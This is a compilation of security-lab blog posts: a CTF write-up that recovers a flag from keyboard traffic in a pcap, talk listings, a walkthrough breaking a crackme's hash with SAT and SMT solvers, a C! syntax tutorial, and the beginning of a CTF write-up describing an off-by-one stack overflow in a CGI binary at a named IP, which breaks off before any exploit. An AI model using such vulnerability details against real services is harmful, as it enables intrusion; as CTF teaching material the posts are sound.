library to parse the pcap file and extract the keycodes:import binascii import dpkt import struct import sys # Start the pcap file parsing f = open(sys.argv[1], 'rb') pcap = dpkt.pcap.Reader(f) # Create a partial mapping from keycodes to ASCII chars keys = {} keys.update({ i + 0x4: chr(i + ord('a')) for i in range(26) }) keys.update({ i + 0x1e: chr(i + ord('1')) for i in range(9) }) keys[0x27] = '0' keys.update({ 0x28: '\n', 0x2c: ' ', 0x2d: '-', 0x2e: '+', 0x2f: '[', 0x30: ']', }) # Then iterate over each USB frame for ts, buf in pcap: # We are interested only in packets that has the expected URB id, and # packets carrying keycodes embed exactly 8 bytes. urb_id = ''.join(reversed(buf[:8])) if binascii.hexlify(urb_id) != 'ffff88003b7d8fc0': continue data_length, = struct.unpack('<I', buf[0x24:0x28]) if data_length != 8: continue key_code = ord(buf[0x42]) if not key_code: continue sys.stdout.write(keys[key_code])
The output of this script was the following “keyboard stream”:
rxterm -geometry 12x1+0+0 echo k rxterm -geometry 12x1+75+0 echo e rxterm -geometry 12x1+150+0 echo y rxterm -geometry 12x1+225+0 echo [ rxterm -geometry 12x1+300+0 echo c rxterm -geometry 12x1+375+0 echo 4 rxterm -geometry 12x1+450+0 echo 8 rxterm -geometry 12x1+525+0 echo b rxterm -geometry 12x1+600+0 echo a rxterm -geometry 12x1+675+0 echo 9 rxterm -geometry 12x1+0+40 echo 9 rxterm -geometry 12x1+75+40 echo 3 rxterm -geometry 12x1+150+40 echo d rxterm -geometry 12x1+225+40 echo 3 rxterm -geometry 12x1+300+40 echo 5 rxterm -geometry 12x1+450+40 echo c rxterm -geometry 12x1+375+40 echo 3 rxterm -geometry 12x1+525+40 echo a rxterm -geometry 12x1+600+40 echo ]
Alright, the intended result is to display the key by first re-ordering the characters according to their terminal positions. We then just had to generate a script that actually opens multiple terminals at the same time, each at the right place and containing the associated character:
python2 extract_keyboard.py dongle.pcap | sed 's/rxterm \(.*\)/xterm \1 -e "\\/g' | sed 's/echo \(.*\)/echo -n \1; read" \&/g' > display_key.sh
And finally, running the
display_key.sh
script gave us the key:key[c48ba993d353ca]
LSE Week 2012 videos
It has been about three months since the 2012 edition of the LSE week, and we are happy because it was quite a success, having on average 57 people attending each talk.
Now it is time to publish the slides (in English) and videos (in French).
CSAT (Pierre-Marie de Rodat - 30mn)
The premise of an interactive disassembler aiming at being collaborative.
ARM architecture (Julien Frêche - 30mn)
Global overview and emulator writing.
Datameat (Victor Apercé - 1h)
Metadata oriented filesystem.
FrASM (Pierre-Marie de Rodat - 30mn)
An assembler writing framework.
Video game console emulation (Pierre Bourdon & Nicolas Hureau - 1h30)
Implications and problems of emulating high performance hardware and cycle-accurate emulation. slides
Possible optimizations for an interpreter (Benoît Zanotti - 30mn)
What can be done? How will it impact performance? Prolog as an example. slides
Routing protocol: BGP4 (Sylvain Laurent - 18h00 - 30mn)
Introduction to BGP4 and its role in networks. slides
WTF is ACPI? (Ivan Delalande - 1h)
Global overview and implementation of an ACPI VM. slides
Forensics (Samuel Chevet - 1h)
Interest and tools. slides
Tutorial: Arduino development (Augustin Chéron - 1h)
Use cases, limitations and demonstration of the Arduino platform. slides
Tutorial: Exploitation techniques (Clément Rouault - 1h)
Examples and mitigation of software exploits. slides
Introduction to CTFs (Nicolas Hureau - 1h)
Interest of participating in security contests and walkthrough of a few exercises. slides
WPA2 enterprise and Wi-Fi security (Pierre Bourdon - 1h)
What is to be avoided when deploying Wi-Fi on a student campus. slides
C!: Interface Implementation (Marwan Burelle - 30mn)
Evolution of rootkits (Samuel Chevet - 1h)
Inner working, analysis and development of the major rootkits. slides
Crackme LSE Week (Pierre Bourdon - 30mn)
Making-of and solution of the LSE Week crackme. slides
Using SAT and SMT to defeat simple hashing algorithms
Note: this article uses MathJax to display formulas written in TeX. Please enable Javascript in order to see the formulas correctly.
One week has passed since the end of LSE Week 2012 and I have received several partial solutions for the crackme that was released at the start of LSE Week for people to play with. Most people who bothered writing partial solutions were able to break the packing and anti debugging parts of it, but stopped at the very end when they faced a simple hashing algorithm they had to reverse to generate a valid key for the crackme. In pseudocode, the algorithm was the following:
a, b, c, d are the four 32 bits integers given as input (key) Compute a simple checksum in order to avoid having several good solutions to the problem: if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0; Kind of useless step just to make things a bit harder a = a XOR c b = b XOR d Then, 128 times in a row, for each integer: Shuffle the bits of the number (using a predefined table) XOR the number with a predefined constant Rotate left the number by N bits (N being another constant) Check if: a == 0x8e2c4c74 b == 0xa6c27e2a c == 0xf5e15d3d d == 0x7bebc2ba
Clever people might notice that all of the operations done by that “hashing” algorithm are actually non destructive and completely reversible. That means our hashing function is bijective (no collisions) and that it is very easy to get the input from the output: just run it in reverse (rotate left becomes rotate right, XOR stays the same, shuffle uses a slightly modified table). It was meant to keep the crackme easy to crack once the code has been recovered and understood. Unfortunately, some last minute bugs cropped up in the implementation of the algorithm (never try to fix bugs at 4AM without automated tests…) and made the algorithm completely different:
a, b, c, d are the four 32 bits integers given as input (key) Compute a simple checksum in order to avoid having several good solutions to the problem: if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0; a = a XOR c b = b XOR d Then, 128 times in a row, for each integer: Shuffle the bits of the number using a table that might map some bits two times, and some other bits zero times (DESTRUCTIVE) XOR the number with a predefined constant Rotate left the number by N bits (N being another constant), except if this is the last number - in this case, rotate the third integer and use it as the new value for the last integer Check if: a == 0x8e2c4c74 b == 0xa6c27e2a c == 0xf5e15d3d d == 0x7bebc2ba
The first error (in the shuffling part) comes from an indexing error in my bits position table. The table was defined like this:
// Maps the input bit position to the output bit position static const char mapping[128] = { // First integer 2, 14, 4, 24, 7, 31, 16, 18, 30, 17, 12, 27, 6, 26, 9, 22, 1, 28, 5, 3, 11, 23, 13, 25, 19, 20, 10, 29, 8, 15, 21, 0, // Second integer 26, 20, 15, 27, 28, 14, 21, 7, 17, 22, 31, 12, 4, 13, 8, 10, 23, 19, 18, 25, 9, 2, 5, 11, 6, 3, 24, 1, 0, 30, 29, 16, // Third integer 4, 26, 20, 13, 21, 29, 3, 14, 5, 22, 18, 6, 28, 23, 16, 10, 15, 27, 25, 1, 17, 0, 30, 2, 8, 24, 7, 9, 31, 19, 12, 11, // Fourth integer 8, 22, 26, 1, 20, 2, 30, 23, 6, 9, 0, 14, 18, 31, 3, 21, 4, 29, 24, 7, 12, 28, 16, 25, 11, 17, 19, 27, 5, 10, 15, 13 };
But the indexing was done like this:
// *pn points to the current integer, i is the index of this integer (0, 1, // 2 or 3), j is the current bit. newn |= ((*pn >> scramble[(i << 2) + j]) & 1) << j;
That
i << 2
should actually be ai << 5
in order to use the whole mapping table. This bug makes the algorithm destructive because some bits from the input will not be used to generate the output. That means you can’t get the input of the step from its output: the destroyed bits could have been 0 or 1.The second bug is actually a stupid typo:
a = ROTL(a, 7); b = ROTL(b, 13); c = ROTL(c, 17); d = ROTL(c, 25);
I don’t think this requires much explanation.
Now that the context of this article has been explained, the real question for me was the following: do these errors make the crackme unsolvable or can it still be solved easily using either bruteforce or more complex analysis techniques?
SAT and its applications to cryptography
I started writing a bruteforcer for this hash using backtracking for each destroyed bit and only exploring the branches that would be valid later on by predicting as much as possible. Unfortunately, while that worked for a small number of iterations of the hash, the original algorithm used 128 iterations and the number of possible combinations increased far too fast to use such a simple technique.
Two days later I got reminded by a friend of a talk presented by Mate Soos at Hackito Ergo Sum 2011 about SAT solvers and their application to cryptography for breaking weak ciphers and hashes. Mate is the author of CryptoMiniSat, a very fast implementation of SAT with a few tweaks that can be used to increase efficiency for crypto usages.
Before going into the details of how to use SAT to break ciphers, let’s talk a little bit about SAT solvers. SAT solvers are programs designed to solve the Boolean Satisfiability Problem, which can be expressed very simply like this: for a given boolean formula, can I find values for the variables that make the formula true? This is an NP-complete problem (which means no polynomial-time algorithm is known for the general case of that problem; the best known algorithms take exponential time in the worst case) and is actually kind of the canonical NP-complete problem: it is a very common technique to reduce a problem to show that it is equivalent to SAT in order to prove that it is an NP complete problem.
Most SAT solvers take their input in a format called DIMACS, which is an easy-to-parse representation of boolean formulas in CNF (Conjunctive Normal Form). A CNF formula is a special case of boolean formula which is always written like this:
$$(X_i \vee \neg X_j) \wedge (\neg X_k \vee X_l \vee \neg X_m \vee X_n) \wedge \ldots$$Basically, CNF is a logical product (aka. conjunction) of sums of variables or negated variables (\(\neg A\)). Every boolean formula can be converted into an equivalent CNF formula, either manually (distribute the \(\vee\) over products) or through an automated process (there are some conversion tables between simple boolean equations and their CNF equivalent).
SAT solvers have a lot of applications and tend to be very optimized in order to have extremely good performance in most cases. It is common to try to solve SAT problems with several hundreds of thousands of clauses (a clause is a single sum of variables or negated variables, like \(A \vee B \vee \neg C \vee D\)) and tens of thousands of variables.
In his talk last year, Mate Soos told us about how HiTag2 (a cryptosystem used in car locks) was reverse engineered, then translated to mathematical formulas and finally converted to CNF formulas describing the relations between input bits and output bits. If you are interested in that talk, it is available on Youtube. I thought that this technique might be of some use in breaking my hash algorithm and started translating the hash algorithm to an equivalent CNF representation.
Breaking the hash with SAT
First of all, the definition of the algorithm would most likely use several thousands of clauses and about as many variables, so writing it by hand is out of the question. I started by writing a very simple library to generate DIMACS files, which exposes the following Python API:
CNFGenerator.new_var()
generates a new SAT variable instance, which has only one operation: logical negation (written-x
)CNFGenerator.add(v1, v2, ..., vN)
adds a clause to the output DIMACS fileCNFGenerator.output()
outputs the DIMACS representation
CryptoMiniSAT also provides a very useful extension to DIMACS for cryptographical uses: the ability to use XOR clauses which are \(A \oplus B \oplus C \oplus \ldots\). These prove very useful in order to write equivalences (\(A \Leftrightarrow B \equiv \neg (A \oplus B) \equiv \neg A \oplus B\)) or simply XOR relations.
CNFGenerator.add_xor
handles the generation of such clauses.Let’s start by defining our input variables. They are four vectors of 32 bits, so 128 boolean variables:
def cnf_int(gen, bits): return [gen.new_var() for i in range(bits)] # Input variables a = cnf_int(gen, 32) b = cnf_int(gen, 32) c = cnf_int(gen, 32) d = cnf_int(gen, 32)
If you follow the pseudocode above, the next step would normally be the checksum. This is actually the hardest part of this algorithm to formalize because of the arithmetic operations (additions and subtractions of 32 bits numbers). We’ll do that last. The following step is
a ^= c; b ^= d
. This is quite easy to formalize. Let’s do it for the general case , i.e.a = b ^ c
. What this does is “make each bit ofa
equal to the same bit ofb
XOR the same bit ofc
”. To formalize it, we can introduce a new variable \(A\) which is equivalent to \(B \oplus C\), which means the clause can only be true iff \(A\) has the same value as \(B \oplus C\). We just need to write that in a form that CryptoMiniSat can understand:$$\begin{aligned} A \Leftrightarrow (B \oplus C) & \equiv \neg (A \oplus (B \oplus C)) \\\\ & \equiv \neg (A \oplus B \oplus C) \\\\ & \equiv \neg A \oplus B \oplus C \end{aligned}$$Applied to the 32 bits of the variables and converted to Python, this gives us the following code:
def cnf_xor(gen, a, b): out = [gen.new_var() for i in range(len(a))] for (a, b, o) in zip(a, b, out): gen.add_xor(-a, b, o) return out # a ^= c, b ^= d a = cnf_xor(gen, a, c) b = cnf_xor(gen, b, d)
Next comes the core of the hashing algorithm: the iterated loop shuffling the bits, XOR-ing with a constant and rotating the number. The interesting part here is that shuffling and rotating bits does not require any clause or additional variables for the SAT representation of the algorithm: For example, if you have a 4 bit integer represented as the vector \(A_3 A_2 A_1 A_0\), rotating it to the left by 2 bits transforms it to the vector \(A_1 A_0 A_3 A_2\). You just need to swap the elements in the list representing your variables. This gives us the following Python code:
def cnf_rotl(gen, n, b): """Performs a left rotation of n by b bits""" return n[-b:] + n[:-b] def cnf_hash(gen, a, b, c, d): """Hashes a, b, c, d, returns new a, new b, new c, new d""" out = [] for i, n in enumerate((a, b, c, d)): scrambled = [n[SCRAMBLE_TABLE[i][j]] for j in range(len(n))] xored = cnf_xor_const(gen, scrambled, XOR_TABLE[i]) out.append(xored) out[0] = cnf_rotl(gen, out[0], ROT_TABLE[0]) out[1] = cnf_rotl(gen, out[1], ROT_TABLE[1]) out[2] = cnf_rotl(gen, out[2], ROT_TABLE[2]) out[3] = cnf_rotl(gen, out[2], ROT_TABLE[3]) return out # Iterate the hash 128 times for a, b, c and d for i in range(128): a, b, c, d = cnf_hash(gen, a, b, c, d)
cnf_xor_const
works the same ascnf_xor
but “optimized” in order to XOR with a constant number instead of a variable number.Now that we computed the hashed values, we just need to put some clauses to make sure they are equal to the hash we are looking for. In the crackme, the hash value was
8e2c4c74a6c27e2af5e15d3d7bebc2ba
. To make sure one of our boolean vectors is equal to a constant value, we add one clause per bit of the vector which forces it to True if the corresponding bit in the constant value is 1, and False if the bit is 0:def cnf_equal(gen, n, c): for i in range(len(n)): b = c & 1 c >>= 1 if b: gen.add(n[i]) else: gen.add(-n[i]) # Check for equality cnf_equal(gen, a, 0x8e2c4c74) cnf_equal(gen, b, 0xa6c27e2a) cnf_equal(gen, c, 0xf5e15d3d) cnf_equal(gen, d, 0x7bebc2ba)
With only this code, the SAT solver will generate us values for a, b, c and d that compute to the hash we are looking for. However, we still have to defeat the checksum. Let’s look at its code again:
if ((ROTL((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)) != 0xa6779036) return 0;
We already know how to compute XORs, rotations and how to check for number equality, so the remaining part is additions and subtractions on 32 bit numbers. As you may already know, subtraction is actually very easy to implement in terms of addition and two’s complement, which is itself very easy to implement in terms of binary inversion and addition:
$$x - y \equiv x + COMPL2(y) \equiv x + INVERT(y) + 1$$def cnf_invert(gen, n): inv = [gen.new_var() for b in n] for (b, i) in zip(n, inv): gen.add(b, i) gen.add(-b, -i) return inv def cnf_sub(gen, a, b): invb = cnf_invert(gen, b) complb = cnf_add(gen, invb, cnf_const32(gen, 1)) return cnf_add(gen, a, complb)
Addition on 32 bit integers is however a lot harder to define. If you did a bit of electrical engineering or if you have implemented an ALU (in HDL, with wires and logic gates, or even in Minecraft) you may know a very common way to define addition using two half adders to make a 1 bit full adder. Here is what a full adder looks like (image courtesy of Wikipedia):
It takes two bits, A and B, as well as a carry from a previous adder (
Cin
), and outputs the sumA + B + Cin
and the carry resulting from that sumCout
. You can then chain these 1 bit full adders to make a 32 bit adder (again, image from Wikipedia):Writing the truth table of a 1 bit full adder and simplifying the equations a bit, you get the following equations for
S
andCout
fromA
,B
andCin
:$$\begin{aligned} S & \equiv \overline{A} B \overline{C_{in}} \vee A \overline{B} \overline{C_{in}} \vee \overline{A} \overline{B} C_{in} \vee A B C_{in} \\\\ C_{out} & \equiv A B \vee A C_{in} \vee B C_{in} \end{aligned}$$You can then translate these formulas to CNF to describe a 1 bit full adder for the SAT solver. However doing that manually is a lot of work (especially if you’re like me and never had proper training on CNF and how to convert formulas to that form), so we’re just going to use the boolean algebra package from Sage to do it automatically:
sage: import sage.logic.propcalc as propcalc sage: f = propcalc.formula("d <-> (~a&b&~c | a&~b&~c | ~a&~b&c | a&b&c)") sage: f.convert_cnf_table() sage: f (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) sage: f = propcalc.formula("d <-> (a&b | a&c | b&c)") sage: f.convert_cnf_table() sage: f (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c) sage: import sage.logic.propcalc as propcalc sage: f = propcalc.formula("d <-> (~a&b&~c | a&~b&~c | ~a&~b&c | a&b&c)") sage: f.convert_cnf_table() sage: f (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) sage: f = propcalc.formula("d <-> (a&b | a&c | b&c)") sage: f.convert_cnf_table() sage: f (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c)
We can then convert the CNF clauses Sage gives us directly to Python:
def cnf_1bitadder(gen, a, b, c): res = gen.new_var() res_carry = gen.new_var() # (d|a|~b|~c)&(d|~a|b|~c)&(d|~a|~b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|b|~c)&(~d|a|~b|c)&(~d|~a|b|c) gen.add(res_carry, a, -b, -c) gen.add(res_carry, -a, b, -c) gen.add(res_carry, -a, -b, c) gen.add(res_carry, -a, -b, -c) gen.add(-res_carry, a, b, c) gen.add(-res_carry, a, b, -c) gen.add(-res_carry, a, -b, c) gen.add(-res_carry, -a, b, c) # (d|a|b|~c)&(d|a|~b|c)&(d|~a|b|c)&(d|~a|~b|~c)&(~d|a|b|c)&(~d|a|~b|~c)&(~d|~a|b|~c)&(~d|~a|~b|c) gen.add(res, a, b, -c) gen.add(res, a, -b, c) gen.add(res, -a, b, c) gen.add(res, -a, -b, -c) gen.add(-res, a, b, c) gen.add(-res, a, -b, -c) gen.add(-res, -a, b, -c) gen.add(-res, -a, -b, c) return res, res_carry
Probably not the nicest way to do it, but most likely one of the simplest ways. We can then use that one bit adder to make a 32 bit adder:
def cnf_add(gen, a, b): carry = gen.new_var() gen.add(-carry) # The first carry is always 0 out = [] for (a, b) in zip(a, b): res, carry = cnf_1bitadder(gen, a, b, carry) out.append(res) return out
With this we can finally implement our checksum!
sum = cnf_add(gen, a, cnf_add(gen, b, cnf_add(gen, c, d))) sub = cnf_sub(gen, cnf_xor(gen, a, b), cnf_xor(gen, c, d)) cksum = cnf_xor(gen, cnf_rotl(gen, sub, 17), sum) cnf_equal(gen, cksum, 0xa6779036)
Running our Python program generates a DIMACS file with 17061 variables and 19365 clauses. CryptoMiniSat can find a set of values that satisfy the clauses in less than 0.05s on my Sandy Bridge based laptop. For example,
a = 0xe9e708e1, b = 0xf7e4c55a, c = 0x85e77db9 and d = 0x5467bd3c
pass both the checksum and the hash and are considered a valid solution.Using Z3 to make things easier
At first I planned to stop there: I had a proof that the crackme was still doable even with that broken hash algorithm. However when I explained what I was doing, a friend of mine told me about SMT solvers. One of their characteristics is that they can work on boolean algebra, but also functions and linear combinations of integer and real variables. For example, you can use an SMT solver for this kind of problem:
$$x^2 + y^2 < 1, 2x + y > 1$$I looked a bit at recent SMT solvers to see if it could make cracking my hash easier. I used the Z3 theorem prover from Microsoft Research, which is not open source but has Linux binaries and nice interfaces for programming languages like Python and OCaml. Z3 can work on real numbers, integers, functions but also bit vectors, and has a nice API to do so.
As expected, things are a lot easier when your solver has native support for your native problem representation (here, bit vectors and unsigned integers). The code cracking the hash using Z3 is a fair bit slower (still less than 5s) but also much shorter and easier to understand:
def rotl32(n, sa):
    """Rotate the 32-bit bit vector *n* left by *sa* bits."""
    # LShR is the logical (zero-filling) right shift, so the two halves
    # never overlap and can simply be OR-ed together.
    return (n << sa) | LShR(n, 32 - sa)


def hash(a, b, c, d):
    """Apply one round of the hash to four 32-bit bit vectors.

    Each input word is scrambled bit by bit (output bit j is input bit
    SCRAMBLE_TABLE[i][j]), XOR-ed with XOR_TABLE[i], then rotated left.

    Returns the list of the four resulting words.
    """
    out = []
    for i, n in enumerate((a, b, c, d)):
        nn = BitVecVal(0, 32)
        for j in range(32):
            nn |= (LShR(n, SCRAMBLE_TABLE[i][j]) & 1) << j
        nn ^= XOR_TABLE[i]
        out.append(nn)
    out[0] = rotl32(out[0], ROT_TABLE[0])
    out[1] = rotl32(out[1], ROT_TABLE[1])
    out[2] = rotl32(out[2], ROT_TABLE[2])
    # NOTE: the fourth word is derived from the already-rotated out[2],
    # not from out[3]. This looks like the flaw of the hash being attacked
    # rather than a typo: the target values for c and d below are bit
    # rotations of each other. Do not "fix" it.
    out[3] = rotl32(out[2], ROT_TABLE[3])
    return out


if __name__ == '__main__':
    # No explicit Solver() is needed: solve() is called directly below.
    a = BitVec('a', 32)
    b = BitVec('b', 32)
    c = BitVec('c', 32)
    d = BitVec('d', 32)

    # The checksum is taken on the raw input words, before any mixing.
    checksum = rotl32((a ^ b) - (c ^ d), 17) ^ (a + b + c + d)

    a ^= c
    b ^= d
    for i in range(128):
        a, b, c, d = hash(a, b, c, d)

    solve(checksum == 0xa6779036,
          a == 0x8e2c4c74,
          b == 0xa6c27e2a,
          c == 0xf5e15d3d,
          d == 0x7bebc2ba)
Here the shorter code is mostly due to the fact that I did not have any nice API to use CryptoMiniSat and to translate arithmetic operations to CNF. SMT solvers do not provide that much of an edge over SAT solvers for this kind of problem: they shine a lot more as soon as you introduce functions or real numbers that can’t easily be expressed as a bit vector.
Conclusion
Sometimes when simple bruteforce does not work you have to go a bit further to reverse a hash algorithm, and using a SAT solver enables you to do just that. The problem is not always easy to formalize, especially when you start using complex operations that can’t easily be translated, but using SAT solvers for cryptography is a very interesting technique that has already proven itself a lot of times in the past, and will probably become more and more useful in the future as SAT solvers and ways to formalize hard problems (like AES) evolve.
C! - system oriented programming - syntax explanation
Following the previous article introducing C!, I now present the language itself. I kept the presentation as short as possible and relate it to C syntax where relevant.
Basic syntax: statement and expressions
Globally, C! code will look like C code. There are a few differences due to some adjustments, but you’ll find the usual operators, function calls, loops and if statements… The global structure of the code will look very familiar.
Among the minor differences are: casts, function pointer usage and type syntax.
Declarations
The most striking difference is probably the declaration syntax. In C, there’s no clear separation between the declared entity (variables, functions or type names) and the type description of the entity. For example, in C, if you declare an array of characters you’ll write something like:
char t[256];
The variable name is t and its type is array of char (the size being some extra information.)
In C!, we choose to break things more clearly, and have in the declaration a part naming the entity and a part describing its type, the previous expression becomes:
t : char[256];
This clarified the question of the position of the star when declaring a pointer, for example in C, we shall write:
char *p;
and in C!:
p : char*;
The star no longer needs to be attached to p and you can’t write ambiguous declarations like:
char* p, c;
Where c is character and not a pointer to character. Of course, the drawback is that we must write two lines for that example:
p : char*; c : char;
The same logic appears on function declaration, for example the following C code:
char f(char c) { if (c < 'a' || c > 'z') return c; return 'A' + c - 'a'; }
Will be written in C!:
f(c : char) : char { if (c < 'a' || c > 'z') return c; return 'A' + c - 'a'; }
We apply the same idea to cast, thus the following code:
void f(void *p, char *c) { *c = *((char*)p); }
becomes:
f(p : void*, c : char*) : void { *c = *(p : char*); }
The same logic is shown in type name definitions:
typedef char *string;
becomes:
typedef string = char*;
Again, function pointer have a simplified syntax: the name of the variable is no longer inside the type. So the following C code:
char (*f)(char,char*);
Becomes:
f : <(char,char*)> : char;
Of course, you can add initialization expressions:
a : char = 'a';
Integer and floating point numbers
We decided to have explicit size and signedness in integer types. Thus, integers are declared as follows:
x : int<32>; // a signed 32bits integer y : int<+16>; // an unsigned 16bits integer z : int<24>; // uncommon size declaration
Sizes that are not standard sizes are stored using the integer types available in C99 (the ones defined in stdint.h) and are masked when needed to prevent usage of unwanted values.
The same ideas apply to floating point numbers:
f : float<64>; // a double float
Of course, you can define some types name (but you can’t use int, char and float):
typedef short = int<16>;
Sized integers in structure definitions are directly translated to bitfields, so we have a single syntax.
We extend the language syntax with a notion of bit arrays: an integer can be used as an array of bits:
x : int<+32> = 41; x[31] = 1; // set the most significant bit to 1 x[31] = 0; // set the most significant bit to 0 x += (x[0] ? 1 : 0); // make x even if not
When setting a bit, any value other than 0 is transformed into 1.
Object Oriented Extension
We introduce a classical, but yet simple, OOP extension to our language. So first, you can define classes with attributes, methods and constructors:
class A { x : int<32>; get() : int<32> { return x; } set(y : int<32>) : void { x = y; } // A simple constructor init(y : int<32>) { x = y; } }
We have simple inheritance and methods are true methods (that is virtual methods):
class B : A { y : float<32>; init(a : int<32>, b : float<32>) { A(this, a) // call A constuctor y = b; } get() : int<32> { return x + (y : int<32>); } }
We don’t have (yet ?) method overloading, only overriding.
Objects in C! are always pointers and you should allocate them yourself (so we don’t rely on a predefined allocator), but you can create some kind of « local object », that is, an object defined on the stack or as a global value.
og : A = A(some_pointer, 41); // object creation require pre-allocation ol : local A(42); // object on the stack og.set(og.get() + 1);
There are no implicit destructor calls for now, but depending on real need we may add them for local objects.
Since we only have pointed-object there’s no implicit copy as in C++ nor there’s need for references. Access to content (all is public) is done with the simple dot syntax.
The constructor for an object is a simple function that takes a pointer to the concrete object (the object pointer) and any needed parameters. It returns the object pointer. If your object is “compatible” with the object built by a given constructor, you can safely pass it to the constructor (as in the previous example).
Local object are not automatically initialized, in the following code
o : local A;
Object o is allocated on the local scope but not initialized: the methods table is “empty” (a method call will fail…). In the near future we will probably be able to detect that, or at least provide a minimal initialization.
We also provide interface and abstract methods.
I may explain generated code in some future article.
Typed macro and Macro Class
We introduce a simple way to define typed macro constants and macro functions: you just add a # at the beginning of a declaration:
#X : int<32> = 42; #square(x : int<32>) : int<32> { return x * x; }
Our macro functions enjoy a real call by value semantics (using some tricks in the generated code) and (once typed by C!) are real cpp macro in the generated code!
The other macro extension is the macro class concept: we syntactically embed a value (of any type) in some kind of object with methods. The result produces special macros but lets you use your values just like an object.
macro class A : int<32> // storage kind { get() const : int<32> // won't modify inner storage { return this; // this represent the inner storage value } set(x : int<32>) : void // non const can modify inner storage { this = x; } }
For now, all “macro code” generates CPP macros (with a lot of tricks to respect call by value and return management). It is not excluded to generate inlined functions in the future, as long as we are sure that the semantics are preserved.
One of the idea behind macro class is to provide a simple syntax (OO like) for constructions that do not require functions (or worse the burden of a whole object.)
Properties
Properties are another extension (very young and poorly tested) in the same spirit as macro classes.
The idea is quite simple: it provides a way to overload access to any kind of value (structured or not) and make it appear as another type (the virtual type). You just have to provide a getter and a setter, and when the context requires the virtual type the compiler automatically inserts the right accessor.
For example, you have a 32-bit unsigned integer stored in two different locations but you want to access it as if it were a plain and simple integer. Suppose you have a structure s storing the two pointers; you would use it this way in plain old C:
unsigned x, y = 70703; x = ((*(s.high)) << 16) + *(s.low); // getting the value *(s.high) = y >> 16; // setting the value *(s.low) = y & (0xffff);
You can declare a property that way (I included the structure describing our splitted integer):
struct segint { high: int<+16>*; low: int<+16>*; } property V(segint) : int<+32> { get() { return ((*(this.high)) << 16) + *(this.low); } set(y : int<+32>) { *(this.high) = y >> 16; *(this.low) = y & (0xffff); } }
And then, to use it:
s : segint; s.high = &high; s.low = &low; // init the struct x : V = s; // warning: x is a copy of s y : int<+32>; y = x + 1; // accessing the value x = 70703 // setting it
Since a property can have any real type you want, it can be part of an object and have its own this pointer corresponding to a pointer to the object (since everything is public, the property has full access to the object).
As of now, accessors are generated as macro and access to the real value is done through a reference (so it can be modified.)
Support for op-assign (operators like +=) and other similar operators (mainly ++) will probably be added later.
LSE Week 2012 announcement
Last year we introduced the idea of doing a yearly week of talks to show the work we are doing here at the LSE, and also to introduce concepts we have been working on, or concepts we have encountered. As it was quite a success, we decided to go on with the idea.
This year, we have reserved 5 days, from Monday, 16th of July to Friday, 20th of July. We have 15 talks scheduled, which amount to 14 hours.
One thing though is that these talks are going to be in French; however, the slides will be in English. Recordings should be available soon after the event.
More information (in French, including a full abstract of each talk) is available on this page.
We are also putting a small crackme online (available here) for people who want some challenge.
Monday, 16th July
CSAT (Pierre-Marie de Rodat - 18h00 - 30mn)
The premise of an interactive disassembler aiming at being collaborative.
ARM architecture (Julien Frêche - 18h30 - 30mn)
Global overview and emulator writing.
Datameat (Victor Apercé - 19h00 - 1h)
Metadata oriented filesystem.
FrASM (Pierre-Marie de Rodat - 20h00 - 30mn)
An assembler writing framework.
Tuesday, 17th July
Video game console emulation (Pierre Bourdon & Nicolas Hureau - 18h00 - 1h30)
Implications and problems of emulating high performance hardware and cycle-accurate emulation.
Possible optimizations for an interpreter (Benoît Zanotti - 19h30 - 30mn)
What can be done? How will it impact performance? Prolog as an example.
Wednesday, 18th July
Routing protocol: BGP4 (Sylvain Laurent - 18h00 - 1h)
Introduction to BGP4 and its role in networks.
WTF is ACPI? (Ivan Delalande - 19h00 - 1h)
Global overview and implementation of an ACPI VM.
Forensics (Samuel Chevet - 20h00 - 1h)
Interest and tools.
Thursday, 19th July
Tutorial: Arduino development (Augustin Chéron - 18h00 - 1h)
Use cases, limitations and demonstration of the Arduino platform.
Tutorial: Exploitation techniques (Clément Rouault - 19h00 - 1h)
Examples and mitigation of software exploits.
Introduction to CTFs (Nicolas Hureau - 20h00 - 30mn)
Interest of participating in security contests and walkthrough of a few exercises.
Friday, 20th July
WPA2 enterprise and Wi-Fi security (Pierre Bourdon - 18h00 - 1h)
What is to be avoided when deploying Wi-Fi on a student campus.
Evolution of rootkits (Samuel Chevet - 19h00 - 1h)
Inner working, analysis and development of the major rootkits.
Crackme LSE Week (Pierre Bourdon - 20h00 - 30mn)
Making-of and solution of the LSE Week crackme.
SecuInside2K12 Prequals: kielbasa writeup
Kielbasa is a linux elf32 cgi binary which generates and validates ASCII art captchas.
It is accessed via the following address:
http://61.42.25.20/captcha/captcha.cgi?q=sent&v=<captcha>&t_s=<timestamp>
It runs on a CentOS 6.2 with exec-shield and stack randomization. SELinux appears to be disabled and mmap_min_addr = 0, so we can mmap the first page. It also turned out that this page was executable.
Disclaimer: Our exploit seemed to fail on the remote service (Apache returned an error), but near the end of the CTF we found out that using another shellcode did in fact work.
Stage 1 - Craft the stack
The vulnerable function is
sub_8048EB0
, it has the following stack:top of the stack ... -0x168 char* QUERY_STRING -0x164 char t_s[32] -0x144 size_t v_size -0x140 char v[32] -0x120 char* user_agent -0x11C char* ptr_to_t_s -0x118 char* remote_port -0x114 char* somewhere -0x110 char* remote_addr -0x109 uint8 mmap_flags -0x108 int use_malloc ... bottom of the stack
There is an off-by-one overflow on the size of the t_s parameter, which lets us overwrite the first byte of v_size (default is 8). As t_s can only contain digits, the maximum value we can put in v_size is 0x39, the ASCII value for 9. Thus we can overwrite the stack up to -0x107 (second byte of use_malloc) with the content of v.
It then executes (many checks have been removed):
